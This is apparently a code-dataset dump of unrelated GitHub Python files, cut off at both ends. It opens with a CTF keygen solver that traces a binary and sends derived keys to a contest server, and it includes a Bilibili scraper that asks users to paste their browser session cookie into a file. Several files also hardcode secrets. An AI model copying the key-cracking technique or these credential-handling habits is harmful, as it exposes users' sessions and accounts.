hasher = \"ltrace ./exec2 ./elf2.patch.bin %s %s 2>&1 > /dev/null | grep strcmp | sed 's/.*\\.\\.\\.\\, //' | sed 's/...) = .*//'\"\n h = process(hasher % (iden, 'f' * 32), shell=True)\n line = h.recvline()[1:][:-2]\n h.close()\n return line\n\ndef sendAnswer(p):\n from binascii import hexlify, unhexlify \n\n iden = p.recvline()[:-1]\n print(\"Checking for %s\" % iden)\n inp = unhexlify(getCheck(iden))\n data = [ord(inp[i]) ^ (i | i << 4) for i in range(len(inp))]\n data = [chr(data[i] & 0xf | data[0xf - i] & 0xf0) for i in range(len(inp))]\n data = ''.join(data)\n p.sendline(hexlify(data))\n p.recvuntil(\"OK\")\n p.recvline()\n print(\"Success!\")\n\n\np = remote('keygenme.ctfcompetition.com', 1337)\nwhile True:\n sendAnswer(p)\n","repo_name":"theKidOfArcrania/ctf-writeups","sub_path":"2018/gctfq/genkey/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"75"} +{"seq_id":"10353185102","text":"\r\nimport diction\r\nfrom analyse import *\r\nimport tkinter\r\nfrom tkinter import *\r\nfrom tkinter import filedialog\r\nfrom tkinter import ttk\r\nimport os\r\n\r\ndef openfile():\r\n filepath = filedialog.askopenfilename(initialdir= os.getcwd(),\r\n title = \"choisissez une trame\",\r\n filetypes=((\"text files\", \"*.txt\"),\r\n (\"all files\", \"*.*\")))\r\n \r\n file = open(filepath, \"r\")\r\n for Widgets in fram1.winfo_children():\r\n Widgets.destroy()\r\n for Widgets in fram2.winfo_children():\r\n Widgets.destroy()\r\n print(filepath)\r\n filename = os.path.basename(filepath)\r\n print(filename)\r\n liste = clean_trames(filename)\r\n \r\n \r\n creat_button(liste)\r\n #obj.pack(clean_trames(filename))\r\n file.close()\r\n\r\ndef creat_button(liste):\r\n i=1\r\n for l in liste:\r\n t = str(i)+\"trame\"\r\n button = Button(fram1,\r\n text=t,\r\n command=lambda k=l,j=t\r\n :click(k,j),\r\n bg=\"green\")\r\n button.pack()\r\n i+=1\r\n\r\ndef creat_small_button(t,name):\r\n button = Button(fram1,\r\n text=t,\r\n command=lambda k=name:click_small_button(name),\r\n bg=\"yellow\")\r\n button.pack()\r\n\r\ndef click_small_button(t):\r\n \r\n os.startfile(t)\r\n\r\ndef show_label(t):\r\n label=Label(fram2,\r\n text=t)\r\n label.pack()\r\n\r\ndef write_res(text,name):\r\n with open(name+'.txt','w') as f:\r\n f.write(text)\r\n\r\ndef click(liste,t):\r\n \r\n res = \"\"\r\n res_ethernet, debut=Ethernet(liste, 0)\r\n \r\n res+=res_ethernet\r\n res_ip, fin_ip= IP(liste, debut)\r\n \r\n res+=res_ip\r\n res_udp,s_p,d=Couche_UDP(liste, fin_ip)\r\n \r\n res+=res_udp\r\n if s_p == 53:\r\n res_dns = DNS(liste,d)\r\n res+=res_dns\r\n res_dhcp = DHCP(liste,d)\r\n \r\n res+=res_dhcp\r\n t = t+\"_res\"\r\n write_res(res,t)\r\n creat_small_button(\"open \"+t,t+\".txt\")\r\n\r\ndef splitTrame(ficher):\r\n with open(ficher, \"r\") as f:\r\n bigTrame = f.read()\r\n splited = bigTrame.split('0000')\r\n splited.remove(\"\")\r\n for x in range(0,len(splited)):\r\n splited[x] = \"0000\" + splited[x]\r\n return splited\r\n\r\ndef checkOffset(a_trame, n):\r\n \r\n \r\n \r\n line1 = \"\"\r\n line2 = \"\"\r\n offset1 = 0\r\n offset2 = 0\r\n nbLine = 1\r\n trame_to_clean = []\r\n read_trame = a_trame.split(\"\\n\") \r\n \r\n while '' in read_trame:\r\n read_trame.remove('')\r\n while ' ' in read_trame:\r\n read_trame.remove(' ')\r\n \r\n\r\n nb_of_lines = len(read_trame)\r\n \r\n for x in range(0,nb_of_lines-1):\r\n line1 = read_trame[x]\r\n line2 = read_trame[x + 1]\r\n\r\n \r\n offset1 = line1.split()[0]\r\n if len(offset1) != 4:\r\n show_label(\"Problem found in trame\" + str(n) + \" line \"+ str(nbLine)+ \", the offset is incorret\")\r\n return \"\"\r\n offset2 = line2.split()[0]\r\n if len(offset2) != 4:\r\n show_label(\"Problem found in trame\" + str(n) + \" line \"+ str(nbLine+1)+ \", the offset is incorret\")\r\n \r\n return \"\"\r\n if isHex(offset1)==False :\r\n show_label(\"Problem found in trame\" + str(n) + \" line \"+ str(nbLine)+ \", \"+ \"the offset is in wrong format\")\r\n \r\n\r\n return \"\"\r\n if isHex(offset2)==False:\r\n show_label(\"Problem found in trame\" + str(n) + \" line \"+ str(nbLine+1)+ \", \"+ \"the offset is in wrong format\")\r\n \r\n\r\n return \"\"\r\n diff = int(offset2,16) - int(offset1,16)\r\n \r\n \r\n if diff <= 0:\r\n show_label(\"Problem found in trame\" + str(n) + \"line \"+ str(nbLine)+ \", \"+ \"the offset is incorret\")\r\n \r\n return \"\"\r\n \r\n \r\n \r\n trame_to_clean.append(line1)\r\n\r\n line1 = line2\r\n nbLine = nbLine + 1 \r\n\r\n \r\n last_line = read_trame[nb_of_lines-1]\r\n trame_to_clean.append(last_line)\r\n \r\n\r\n \r\n\r\n nb_of_lines = len(trame_to_clean)\r\n nbLine = 1\r\n for x in range(0,nb_of_lines-1):\r\n line1 = trame_to_clean[x]\r\n line2 = trame_to_clean[x + 1]\r\n \r\n offset1 = line1.split()[0]\r\n offset2 = line2.split()[0]\r\n diff = int(offset2,16) - int(offset1,16)\r\n \r\n word_list_line1 = line1.split()\r\n for t in range (1,len(word_list_line1)):\r\n if isHex(str(t)) == False:\r\n show_label(\"this trame is in wrong format\")\r\n return \"\"\r\n number_of_words_in_line1 = len(word_list_line1)\r\n \r\n if (diff > 0):\r\n if number_of_words_in_line1 < diff + 1:\r\n show_label(\"Problem found in trame\" + str(n) + \" line \"+ str(nbLine)+ \", \"+ str(diff - number_of_words_in_line1 + 1)+ \"byte are missing\")\r\n \r\n return \"\"\r\n elif number_of_words_in_line1 > diff + 1:\r\n show_label(\"Problem found in trame\" + str(n) + \" line \"+ str(nbLine)+ \", \"+ str(number_of_words_in_line1 + 1 - diff)+ \" byte more\")\r\n \r\n return \"\"\r\n else:\r\n words=line1.split()\r\n words = words[0:diff+1]\r\n line1 = \" \".join(words)\r\n trame_to_clean[x] = line1\r\n \r\n\r\n line1 = line2\r\n nbLine = nbLine + 1 \r\n \r\n\r\n\r\n \r\n return trame_to_clean\r\n\r\ndef cut_into_bytes(trame):\r\n for x in range(0, len(trame)):\r\n trame[x].split(' ', 1)\r\n trame[x] = trame[x].split(' ', 1)[1]\r\n \r\n trame = \" \".join(trame)\r\n \r\n trame = trame.split(\" \")\r\n while '' in trame:\r\n trame.remove('')\r\n while ' ' in trame:\r\n trame.remove(' ')\r\n \r\n return trame\r\n\r\ndef rebuild_trame(trames):\r\n while '' in trames:\r\n trames.remove('')\r\n while ' ' in trames:\r\n trames.remove(' ')\r\n \r\n return trames\r\n\r\ndef clean_trames(ficher):\r\n splited = splitTrame(ficher)\r\n \r\n for x in range (0,len(splited)):\r\n \r\n splited[x] = checkOffset(splited[x], x+1)\r\n \r\n if splited[x] != \"\":\r\n splited[x] = cut_into_bytes(splited[x])\r\n \r\n splited = rebuild_trame(splited)\r\n \r\n return splited\r\n\r\n\r\ndef isHex(s):\r\n hexNumber = set(\"0123456789abcdefABCDEF\")\r\n for char in s:\r\n if not (char in hexNumber):\r\n return False\r\n return True \r\n\r\n\r\nwindow = Tk()\r\nwindow.geometry(\"700x600\")\r\nwindow.title(\"Analyseur des trames\")\r\n\r\n\r\n\r\nmenubar = Menu(window)\r\nwindow.config(menu=menubar)\r\nfile_menu = Menu(menubar, tearoff=0)\r\nmenubar.add_cascade(label=\"file\", menu = file_menu)\r\nfile_menu.add_command(label=\"Open\", command=openfile)\r\nfile_menu.add_separator()\r\nfile_menu.add_command(label=\"Exit\", command=quit)\r\n\r\npanedwindow=ttk.Panedwindow(window, orient=HORIZONTAL) \r\npanedwindow.pack(fill=BOTH, expand=True) \r\n \r\nfram1=ttk.Frame(panedwindow,width=100,height=300, relief=SUNKEN) \r\nfram2=ttk.Frame(panedwindow,width=390,height=390,relief=SUNKEN) \r\n \r\npanedwindow.add(fram1, weight=1) \r\npanedwindow.add(fram2, weight=1) \r\n \r\n\r\nwindow.mainloop()\r\n\r\n","repo_name":"Yukhoi/Python_Analyseur-de-Protocoles-Reseau-Offline","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":7473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19117406851","text":"import smtplib\nfrom email.mime.text import MIMEText\n\nheader = 'Hello. This is an automated email.\\n\\n'\n\ndef send(subject, to, frm, text):\n # The message to send\n msg = MIMEText(header + text)\n msg['Subject'] = subject\n msg['To'] = to\n msg['From'] = frm\n\n # Connect to gmail's email server and send\n s = smtplib.SMTP('smtp.gmail.com', port=587)\n s.ehlo()\n s.starttls()\n s.login(user=frm, password='password')\n s.sendmail(frm, [to], msg.as_string())\n s.quit()\n\nif __name__ == \"__main__\":\n send(\n subject='A coupon for you!',\n to='billgates@microsoft.com',\n frm='JohnnysHotDogs1@gmail.com',\n text='Enjoy!')","repo_name":"M1-CHAEL/Introduction-To-Programming-In-Python-C859","sub_path":"Labs/Chp11-Modules/Send-gmail.py","file_name":"Send-gmail.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"21539157515","text":"import requests\nimport json\n\n# # 创建 session 方法\n# session = requests.session()\n# # 请求登录\n# print(\"**********登录模块**********\")\n# login_API = 'http://passport.bilibili.com/qrcode/getLoginUrl'\n# login_headers = {\n# \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36\"\n# }\n# login_info_resp = requests.get(login_API, headers=login_headers)\n# login_info_data = login_info_resp.text\n# # 返回Python类型\n# login_info_data = json.loads(login_info_data)\n# # 取出登录链接\n# login_check_link = login_info_data['data']['url']\n# login_check_oauthKey = login_info_data['data']['oauthKey']\n# # 生成二维码以供登录\n# qrcode_img = qrcode.make(login_check_link)\n# qrcode_img.save('./img/login.png')\n# # 展示二维码\n# print(\"请按任意键完成登录...\")\n# login_qrcode = cv.imread(\"./img/login.png\")\n# cv.imshow(\"bilibili-qrcode_login\", login_qrcode)\n# cv.waitKey(0)\n# cv.destroyAllWindows()\n#\n# # 获得cookie\n# tokenurl = 'https://passport.bilibili.com/qrcode/getLoginInfo'\n# 等待输入case_id\n# 读取 cookie.txt\nwith open(\"./cookie.txt\", \"r\") as doc:\n bili_cookie = doc.read()\n if bili_cookie == '':\n print(\"状态:\")\n print(\"cookie.txt 文件为空!\")\n print(\"请根据引导操作:\")\n print(\"请打开处于B站登录态的浏览器,按F12,找到控制台(console),在其中输入 document.cookie \")\n print(\"将控制台输出的结果完整复制到文件夹内的cookie.txt文件中,并保存\")\n print(\"请执行操作!程序即将退出!\")\n exit()\n else:\n print(\"状态:cookie获取完成!\")\n# 请求输入案件id\ncase_id = input(\"请输入需要查询的案件id:\")\n\n# headers 及各项API初始化\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36\",\n \"cookie\": bili_cookie\n}\n# 案件详情\njudge_API = 'https://api.bilibili.com/x/credit/v2/jury/case/info?case_id={}'.format(case_id)\n# 众议观点(因后台控制,不可抓取前端不可见内容)\njudge_content_API = 'https://api.bilibili.com/x/credit/v2/jury/case/opinion?case_id={}'.format(case_id)\n# response\njudge_info_resp = requests.get(judge_API, headers=headers)\njudge_info_data = judge_info_resp.text\n# 返回Python类型\njudge_info_data = json.loads(judge_info_data)\n# API状态解析\njudge_info_code = judge_info_data['code'] # 服务器在json中返回的状态码\njudge_info_status = judge_info_data['message'] # 服务器在json中返回的状态message\nprint(\"请求状态:\", judge_info_code, judge_info_status)\n# 开始 json 解析\n# 注:存在一个case_id\n# type = 1 AC14x411c74g\n# type = 2 AC18x411c7Px\n# type = 3 AC1bx411c7fi\n# type = 4 AC14x411c7Kz\ncase_type = judge_info_data['data']['case_type'] # 1:单条评论 2:评论氛围 3:单条弹幕 4:弹幕氛围\ncase_avid = judge_info_data['data']['avid'] # AV号\ncase_cid = judge_info_data['data']['cid'] # cid\ncase_vote_cd = judge_info_data['data']['vote_cd'] # 投票冷却时间\ncase_result_text = judge_info_data['data']['result_text'] # 系统综合结果\ncase_content_title = judge_info_data['data']['title'] # 稿件标题\n\n# case_info 对应的参数\n# 在case_type = 1 时的情形\nif case_type == 1:\n case_type_desc = '单条评论' # 对case类型的描述\n case_uname = judge_info_data['data']['case_info']['comment']['uname'] # type=1\n case_content = judge_info_data['data']['case_info']['comment']['content'] # type=1\n case_child_comments = judge_info_data['data']['case_info']['child_comments'] # type=1\n case_danmaku_img = '不支持' # type=4\n# 在case_type = 2 时的情形\n# elif case_type == 2:\n\n# 在case_type = 3 时的情形\nelif case_type == 3:\n case_type_desc = '单条弹幕'\n case_uname = '不支持'\n case_content = judge_info_data['data']['case_info']['single_danmu']['content']\n case_chiled_comments = '不支持'\n# 在case_type = 4 时的情形\nelif case_type == 4:\n case_type_desc = '弹幕氛围' # 对case类型的描述\n case_uname = '不支持' # type=1\n case_content = '不支持' # type=1\n case_child_comments = '不支持' # type=1\n case_danmaku_img = judge_info_data['data']['case_info']['danmu_img'] # type=4\n\n# 投票情况\ncase_all_opinion = judge_info_data['data']['vote_info']['all_count']\ncase_good_opinion = judge_info_data['data']['vote_info']['counts'][0]\ncase_normal_opinion = judge_info_data['data']['vote_info']['counts'][1]\ncase_bad_opinion = judge_info_data['data']['vote_info']['counts'][2]\ncase_denied_opinion = judge_info_data['data']['vote_info']['counts'][3]\n\n# 抓取众议观点基础参数\njudge_content_resp = requests.get(judge_content_API, headers=headers)\njudge_content_data = judge_content_resp.text\n# 返回Python类型\njudge_content_data = json.loads(judge_content_data)\n# 众议观点总数\ncase_comment_num = int(judge_content_data['data']['total'])\n# 每页只有20条众议观点\nif case_comment_num % 20 != 0:\n page = int((case_comment_num - case_comment_num % 20) / 20 + 1)\nelse:\n page = int(case_comment_num / 20)\n# 数值初始化\nr = 0\npage_num = 1\ntimes = 0\n# 输出\nprint(\"**********************************************************************\")\nprint(\"案件简介:\")\nprint(\"案件类型:\", case_type_desc, \"案件类型id:\", case_type)\nprint(\"案件标题:\", case_content_title, '|', \"AV号:\", case_avid, \"cid:\", case_cid)\nprint(\"----------------------------------------------------------------------\")\nprint(\"案件详情:\")\nprint(\"涉案角色昵称:\", case_uname, \"涉案评论:\", case_child_comments)\nprint(\"涉案弹幕截图:\", case_danmaku_img)\nprint(\"投票冷却时间:\", case_vote_cd, \"秒\")\nprint(\"----------------------------------------------------------------------\")\nprint(\"投票情况:\")\nprint(\"总投票数:\", case_all_opinion)\nprint(\"好:\", case_good_opinion, \"普通:\", case_normal_opinion, \"差:\", case_bad_opinion, \"无法判断:\", case_denied_opinion)\nprint(\"----------------------------------------------------------------------\")\nprint(\"众议观点:\")\nfor page in range(1, page + 1):\n comment_API = 'https://api.bilibili.com/x/credit/v2/jury/case/opinion?case_id={}&pn={}&ps=20'.format(case_id, page_num)\n comment_resp = requests.get(comment_API, headers=headers)\n comment_data = json.loads(comment_resp.text)\n r_max = len(comment_data['data']['list'])\n print('=====当前是第', page_num, '页=====')\n for r in range(0, r_max):\n comment_opid = comment_data['data']['list'][r]['opid']\n comment_mid = comment_data['data']['list'][r]['mid']\n comment_uname = comment_data['data']['list'][r]['uname']\n comment_vote_text = comment_data['data']['list'][r]['vote_text']\n comment_content = comment_data['data']['list'][r]['content']\n comment_anonymous = comment_data['data']['list'][r]['anonymous']\n if comment_anonymous == 0:\n comment_anonymous = '实名'\n else:\n comment_anonymous = '匿名'\n comment_like = comment_data['data']['list'][r]['like']\n comment_hate = comment_data['data']['list'][r]['hate']\n print(\"*****这是第\", times + 1, \"条评论****\")\n print(\"opid:\", comment_opid, \"|\", \"uid:\", comment_mid)\n print(\"发送者:\", comment_uname, \"|\", \"状态:\", comment_anonymous)\n print(\"众议观点:\", comment_vote_text, \"众议内容:\", comment_content)\n print(\"赞:\", comment_like, \"|\", \"踩:\", comment_hate)\n times = times + 1\n page_num = page_num + 1\n # 如遇管控策略,导致计算出的页数和实际数量不符,则结束程序\n if len(comment_data['data']['list']) == 0:\n break","repo_name":"AlanStar233/Bilibili-tools","sub_path":"judgement_info.py","file_name":"judgement_info.py","file_ext":"py","file_size_in_byte":7762,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"20301738601","text":"import datetime\nimport exception\nimport product as product_module\n\n\nclass ShoppingCart:\n def __init__(self):\n self.items = {}\n\n def add_item(self, product, quantity=1):\n if type(product) is not product_module.Product:\n raise exception.IncorrectTypeError('This is not a product.')\n if type(quantity) is not int:\n raise exception.IncorrectTypeError('Quantity must be int.')\n if quantity < 1:\n raise exception.UnallowedValueError('Quantity must be positive.')\n try:\n self.items[product] += quantity\n except KeyError:\n self.items[product] = quantity\n\n def remove_item(self, product):\n if type(product) is not product_module.Product:\n raise exception.IncorrectTypeError('This is not a product.')\n try:\n del self.items[product]\n except KeyError:\n return False\n return True\n\n def total(self):\n result = 0\n for product, quantity in self.items.items():\n result += product.get_price(quantity)\n return result\n\n def receipt(self, *, width=50):\n if type(width) is not int:\n raise exception.IncorrectTypeError('Width must be int.')\n\n # ---------------- Calculate column sizes --------------------------\n if width < 26: # minimum for date + time\n width = 26\n min_name_width = 8\n min_quantity_width = 5\n min_price_width = 7\n total = self.total()\n price_width = len('{:.2f}'.format(total)) + 2\n if price_width < min_price_width:\n price_width = min_price_width\n quantity_width = 0\n for _, quantity in self.items.items():\n if len(str(quantity)) > quantity_width:\n quantity_width = len(str(quantity))\n quantity_width += 2\n if quantity_width < min_quantity_width:\n quantity_width = min_quantity_width\n name_width = width - (price_width + quantity_width + 3)\n if name_width < min_name_width:\n name_width = min_name_width\n width = name_width + quantity_width + price_width + 3\n\n # ---------------- Define helping functions ------------------------\n def add_line(*, name_area='-', quantity_area='', price_area=''):\n if name_area == '-': # spacer line\n return (\n '+' + '-' * (name_width + quantity_width) + '+' +\n '-' * price_width + '+' + '\\n'\n )\n else: # actual content\n chunk = len(name_area)\n chunk_size = (name_width - 1)\n\n # split name area field into chunks to fit in name width\n name_parts = [\n name_area[i:i + chunk_size]\n for i in range(0, chunk, chunk_size)\n ]\n result = (\n '|' + ' ' + name_parts[0].ljust(name_width - 1) +\n quantity_area.rjust(quantity_width - 1) + ' ' + '|' +\n price_area.rjust(price_width - 1) + ' ' + '|' + '\\n'\n ) # put 1st chunk with quantity and price info\n for part in name_parts[1:]:\n result += (\n '|' + ' ' + part.ljust(name_width - 1) +\n ' ' * quantity_width + '|' +\n ' ' * price_width + '|' + '\\n'\n ) # leave rest of chunks without\n return result\n\n def add_footer(): # adds date and time\n result = '|'\n result += (\n 'Date: ' + str(datetime.datetime.now())[:-10]\n ).center(width - 2)\n result += '|' + '\\n'\n result += '+' + '-' * (width - 2) + '+'\n return result\n\n # ---------------- Add column names --------------------------------\n result = add_line()\n result += add_line(\n name_area='Product',\n quantity_area='qty',\n price_area='price'\n )\n result += add_line()\n\n # ---------------- Add products ------------------------------------\n for product, quantity in self.items.items():\n normal_price = product.price * quantity\n result += add_line(\n name_area=product.name,\n quantity_area=str(quantity),\n price_area='{:.2f}'.format(normal_price)\n )\n if product.promotion:\n result += add_line(\n name_area=' ' + product.promotion.receipt_message(),\n price_area='{:.2f}'.format(\n product.get_price(quantity) - normal_price)\n )\n\n # ---------------------- rest --------------------------------------\n result += add_line()\n result += add_line(\n name_area='Total',\n price_area='{:.2f}'.format(total)\n )\n result += add_line()\n result += add_footer()\n return result\n","repo_name":"VLatunoV/Python-Final-Project","sub_path":"shopping_cart.py","file_name":"shopping_cart.py","file_ext":"py","file_size_in_byte":5033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"11731180642","text":"import plotly.express as px\nimport pandas as pd\nfrom plotly.graph_objs import Figure\n\n\ndef create_topic_cluster_scatter(df: pd.DataFrame, category: str) -> Figure:\n \"\"\"\n Create and combine two scatter plots:\n (1) clustered data points (non-negative cluster labels)\n (2) outliers(cluster label -1)\n \n Parameters:\n - df (pd.DataFrame): DataFrame containing data points with cluster labels.\n - category (str): The name of the column to use for coloring data points.\n \"\"\"\n \n outliers = df.loc[df.cluster_label == -1, :]\n clustered = df.loc[df.cluster_label != -1, :]\n \n # scatter plot for clustered data points\n fig = px.scatter(clustered, x='umap_x', y='umap_y', color= category, hover_data = {\n 'umap_x': False,\n 'umap_y': False,\n 'top_words': True,\n 'cluster_label': True\n })\n \n fig.update_traces(hovertemplate='Top words: %{customdata[0]}
Cluster=%{marker.color}')\n\n # scatter plot for outliers\n outliers_scatter = px.scatter(outliers, x='umap_x', y='umap_y', hover_data = {\n 'umap_x': False,\n 'umap_y': False,\n 'top_words': False,\n 'cluster_label': True\n } )\n outliers_scatter.update_traces(marker=dict(color='lightgray', size = 5), text = 'outliers', hovertemplate='Unclassified')\n\n # add the outlier scatter plot to fig with clusters\n fig.add_trace(outliers_scatter.data[0])\n return fig\n\n\n\ndef custom_scatter_layout(fig: Figure, plot_title: str, x_title: str, y_title: str) -> Figure:\n \"\"\"\n Customizes the layout of a Plotly scatter plot.\n \"\"\"\n fig.update_layout(\n plot_bgcolor = 'white',\n title=plot_title,\n xaxis_title=x_title,\n yaxis_title=y_title,\n height=700,\n width=1000\n )\n\n fig.update_xaxes(\n mirror=True,\n ticks='outside',\n showline=True,\n linecolor='black',\n gridcolor='white'\n )\n\n fig.update_yaxes(\n mirror=True,\n ticks='outside',\n showline=True,\n linecolor='black',\n gridcolor='white'\n )\n\n return fig\n","repo_name":"DorotaBjoorn/Text-Classification-LIA-project","sub_path":"src/visualisation.py","file_name":"visualisation.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"42011165643","text":"def draw_labeled_bboxes(img, labels):\n bbox_ = []\n # Iterate through all detected cars\n for car_number in range(1, labels[1]+1):\n # Find pixels with each car_number label value\n nonzero = (labels[0] == car_number).nonzero()\n # Identify x and y values of those pixels\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n # Define a bounding box based on min/max x and y\n bbox = ((np.min(nonzerox), np.min(nonzeroy)), (np.max(nonzerox), np.max(nonzeroy)))\n # Draw the box on the image\n cv2.rectangle(img, bbox[0], bbox[1], (0,0,255), 6)\n bbox_.append(bbox)\n # Return the image\n return img, bbox_","repo_name":"I-Abdullah-I/CSE464-class-project","sub_path":"Phase II/Helpers/draw_labeled_bboxes.py","file_name":"draw_labeled_bboxes.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7825722970","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n # Obstetrics module urls start\n\n path('obstetric_main/', views.obstetric_main, name = \"obstetric_main\"),\n path('obstetric_add/', views.obstetric_add, name = \"obstetric_add\"),\n path('perinatal_info_monitors/', views.perinatal_info_monitors, name = \"perinatal_info_monitors\"),\n path('perinatal_info/', views.perinatal_info, name = \"perinatal_info\"),\n path('prenatal_evaluations/', views.prenatal_evaluations, name = \"prenatal_evaluations\"),\n path('puerperium_monitor/', views.puerperium_monitor, name = \"puerperium_monitor\"),\n \n\t# Obstetrics module urls end\n]","repo_name":"frahman30/Health-Care-System","sub_path":"health_obstetrics/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"11859238095","text":"import os\nimport openai\nfrom dotenv import load_dotenv\nimport tiktoken\nfrom langchain.embeddings.openai import OpenAIEmbeddings\nfrom langchain.text_splitter import CharacterTextSplitter\nfrom langchain.vectorstores import FAISS\nfrom langchain.document_loaders import TextLoader\n\n# Loading values from .env file\nload_dotenv()\nAPI_KEY = os.environ.get(\"API_KEY\")\nos.environ[\"OPENAI_API_KEY\"] = API_KEY\nopenai.api_key = API_KEY\n\nCHUNK_SIZE = 1024 # Количество токинов в чанке\nNUMBER_RELEVANT_CHUNKS = 5 # Количество релевантных чанков\n\nloader = TextLoader(\"Docs/База знаний УИИ.txt\", encoding='utf8')\ndocuments = loader.load()\ntext_splitter = CharacterTextSplitter(separator=\"\\n\", chunk_size=CHUNK_SIZE, chunk_overlap=0)\ndocs = text_splitter.split_documents(documents)\n\n# всего получилось чанков:\nprint(f'len(docs)={len(docs)}')\n\n# первый чанк\nprint(f'первый чанк = {docs[0]}')\npage_content = docs[0].page_content\n# длина первого чанка\nprint(f'длина первого чанка = {len(page_content)}')\n\nprint(f'metadata до = {docs[0].metadata}')\n# Устанавливаем метаданные для первого чанка\ndocs[0].metadata[\"teg\"] = \"Описание УИИ\"\n\n# Так перезапишет\n# docs[0].metadata = {\"teg\": \"Описание УИИ\"}\n\n# выводим на печать обновленные метаданные чанка\nprint(f'metadata псле = {docs[0].metadata}')\n\n# Инициализирум модель эмбеддингов\nembeddings = OpenAIEmbeddings()\n\n# Создадим индексную базу из разделенных фрагментов текста\n# https://python.langchain.com/docs/integrations/vectorstores/faiss\ndb = FAISS.from_documents(docs, embeddings)\n\n# Поиск текста по схожести\n# similarity_search\nprint('similarity_search')\nquery = \"нужно ли знать математику?\"\ndocs = db.similarity_search(query, k=NUMBER_RELEVANT_CHUNKS)\n\ni=1\nfor item in docs:\n print(f'{i} item.page_content={item.page_content}\\n\\n')\n i += 1\n\n# similarity_search_with_score\nprint('similarity_search_with_score')\ndocs_and_scores = db.similarity_search_with_score(query, k=NUMBER_RELEVANT_CHUNKS)\n\n# print (type(docs_and_scores))\n# print (docs_and_scores)\ni=1\nfor doc in docs_and_scores:\n print(f'{i}')\n for item in doc:\n print (item)\n\n i += 1\n print(f'\\n')\n\n# Нужно проверять условие изменения файла Базы знаний.\n# db.save_local(\"/content/drive/My Drive/faiss_index\")\ndb.save_local(\"DB/faiss_index\")\nprint('Db saved')\n\n#Load file.\nnew_db = db.load_local('DB/faiss_index', embeddings)\nprint('Db loaded')\n\ndocs = new_db.similarity_search(query, k=NUMBER_RELEVANT_CHUNKS)\n\ni=1\nfor item in docs:\n print(f'{i} item.page_content={item.page_content}\\n\\n')\n i += 1\n","repo_name":"kvoloshenko/LLMT_01","sub_path":"ChatGPT_Course_01/L1_04_Text2chunks.py","file_name":"L1_04_Text2chunks.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71173159921","text":"from flask import Flask, render_template, flash, request, session, redirect\nfrom datetime import datetime\nimport requests\nfrom model import connect_to_db, db, User, Collection, Outfit, Character, Shop, Item, Show\nimport crud\nimport os\nfrom dotenv import dotenv_values\n\nconfig = {\n **dotenv_values(\".env.secret\"),\n **os.environ,\n}\n\napp = Flask(__name__)\napp.secret_key = 'secret_key'\n\n# Display Webpages\n@app.route('/')\ndef show_homepage():\n if 'user_info' not in session:\n session[\"user_info\"] = {}\n session.modified = True\n return render_template(\"homepage.html\")\n else:\n return render_template(\"homepage.html\")\n\n@app.route('/my-accounts')\ndef nav_user_acct_name():\n \n if 'user_name' not in session[\"user_info\"]:\n return redirect('/login')\n else:\n return render_template(\"account.html\")\n\n@app.route('/my-collections')\ndef nav_user_collections():\n \n if 'user_name' not in session[\"user_info\"]:\n return redirect('/login')\n else:\n return render_template(\"collections.html\", page_type=\"base\")\n\n@app.route('/my-collections/')\ndef nav_to_collection(collection_name):\n return render_template(\"collections.html\", page_type=\"collection\")\n\n@app.route('/my-outfits')\ndef nav_user_outfits():\n \n if 'user_name' not in session[\"user_info\"]:\n return redirect('/login')\n else:\n return render_template(\"outfits.html\", page_type=\"base\")\n\n@app.route('/my-outfits/')\ndef nav_to_outfit(outfit_name):\n return render_template(\"outfits.html\", page_type=\"ind_outfit\")\n\n@app.route('/login')\ndef nav_login():\n return render_template(\"login.html\")\n\n@app.route('/characters')\ndef nav_character():\n return render_template(\"characters.html\", page_type=\"base\")\n\n@app.route('/characters/')\ndef show_character_page(character_name):\n\n return render_template(\"characters.html\", page_type=\"ind_character_page\")\n\n@app.route('/shows')\ndef nav_show():\n return render_template(\"shows.html\", page_type=\"base\")\n\n@app.route('/shows/')\ndef show_show_page(show_title):\n \n return render_template(\"shows.html\", page_type=\"ind_show_page\")\n\n@app.route('/create/new-outfit')\ndef nav_create_new_outfit_page():\n \n if 'user_name' not in session[\"user_info\"]:\n return redirect('/login')\n else:\n return render_template(\"create.html\", page_type=\"new_outfit\")\n \n@app.route('/create/new-collection')\ndef nav_create_new_collection_page():\n \n if 'user_name' not in session[\"user_info\"]:\n return redirect('/login')\n else:\n return render_template(\"create.html\", page_type=\"new_collection\")\n\n@app.route('/create')\ndef nav_create_page():\n \n if 'user_name' not in session[\"user_info\"]:\n return redirect('/login')\n else:\n return render_template(\"create.html\")\n\n# POST and GETS\n# api routes\n@app.route('/disp_all_anime', methods=[\"POST\"])\ndef disp_all_anime():\n page_change = request.get_json()\n page_number = page_change[\"page\"]\n\n url, query, variables = crud.get_all_anime()\n variables = {\"page\": page_number, \"perPage\": 20}\n response = requests.post(url, json={'query': query, 'variables': variables}).json()['data']['Page']\n return 